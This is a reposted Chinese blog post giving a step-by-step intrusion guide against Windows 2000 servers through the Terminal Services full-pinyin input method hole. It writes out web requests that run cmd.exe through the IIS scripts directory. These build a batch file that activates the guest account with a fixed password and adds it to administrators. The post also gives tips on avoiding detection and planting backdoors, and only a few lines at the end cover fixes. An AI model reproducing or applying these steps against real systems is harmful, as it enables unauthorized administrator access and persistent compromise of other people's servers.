ITPub博客

首页 > Linux操作系统 > Linux操作系统 > 3389端口的入侵,Win Server2000 全拼输入法漏洞(转)

3389端口的入侵,Win Server2000 全拼输入法漏洞(转)

原创 Linux操作系统 作者:ljm0211 时间:2012-07-02 17:30:22 0 删除 编辑
由于微软对中国产品不付责任的态度,使得安装了终端服务和全拼的w2k 服务器存在着远程登陆并能获取超级用户权限的严重漏洞。
其过程如下:

1.扫描 3389 port 终端服务默认;
2.用终端客户端程序进行连接;
3.按ctrl+shift调出全拼输入法(其他似乎不行),点鼠标右键(如果其帮助菜单发灰,就赶快赶下家吧,人家打补丁了),点帮助,点输入法入门;
4.在"选项"菜单上点右键--->跳转到URL",输入:c:\winnt\system32\cmd.exe.(如果不能确定NT系统目录,则输入:c:\ 或d:\
……进行查找确定);
5.选择"保存到磁盘" 选择目录:c:\inetpub\scripts\,因实际上是对方服务器上文件自身的复制操作,所以这个过程很快就会完成;
6.打开IE,输入http://ip/scripts/cmd.exe?/c dir 怎么样?有cmd.exe文件了吧?这我们就完成了第一步;
7http://ip/scripts/cmd.exe?/c echo net user guest /active:yes>go.bat
8http://ip/scripts/cmd.exe?/c echo net user guest elise>>go.bat
9http://ip/scripts/cmd.exe?/c echo net localgroup administrators /add
guest>>go.bat
10http://ip/scripts/cmd.exe?/c type go.bat 看看我们的批文件内容是否如下:

net user guest /active:yes
net user guest elise
net localgroup administrators /add guest
11.在"选项"菜单上点右键--->跳转到URL",输入:c:\inetpub\scripts\go.bat --->在磁盘当前位置执行;
12. 呵呵,大功告成啦,这样我们就激活了服务器的geust帐户,密码为:elise,超级用户呢!(我喜欢guest而不是建立新帐户,这样似乎不易被发现 些),这样你就可用IPC$连接,想怎样做就怎样做了,当然,你也可用guest直接登陆到他的服务器,到他机器上去跳舞吧:-)

注意事项:
1.当你用终端客户端程序登陆到他的服务器时,你的所有操作不会在他的机器上反应出来,但如果他正打开了终端服务管理器,你就惨了了:(这时他能看到你所打开的进程id、程序映象,你的ip及机器名,并能发消息给你!
2.当你连接时,会加重对方服务器的负荷,非常容易造成对方死机和断线,所以你的操作快点为妙。
3.尽快做好后门,暂时不要上传任何程序,一是防止断线,二是防止对方打上补丁!
个人观点:
1.在IE下,所拥有的只是iusr_machine权限,因而,你不要设想去做越权的事情,如启动telnet、木马等;
2.url的跳转下,你将拥有超级用户的权限,好好利用吧
3.跳转到哪个目录下,通常只能查看、执行当前目录的文件,不能进入到子目录,如想进入,再跳一次吧!:)
4.此法似乎与对方的防火墙无关哦!
5.据本人实际操作,发现极易断线,但应与占用服务器资源无关。对方是384M RAM+PIII,是静态IP,主要是做数据库服务器,RAID硬盘,SCSI CD
ROM,开机18天了,02:00进去时,仍时常吊线。

堵漏办法:
1.打补丁;
2.删掉全拼输入法,用标准就成了嘛^_^;
3.服务中关掉:Terminal Services,服务名称:TermService,对应程序名:system32\termsrv.exe;

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/11411056/viewspace-734408/,如需转载,请注明出处,否则将追究法律责任。

请登录后发表评论 登录
全部评论

注册时间:2009-05-14

  • 博文量
    272
  • 访问量
    436773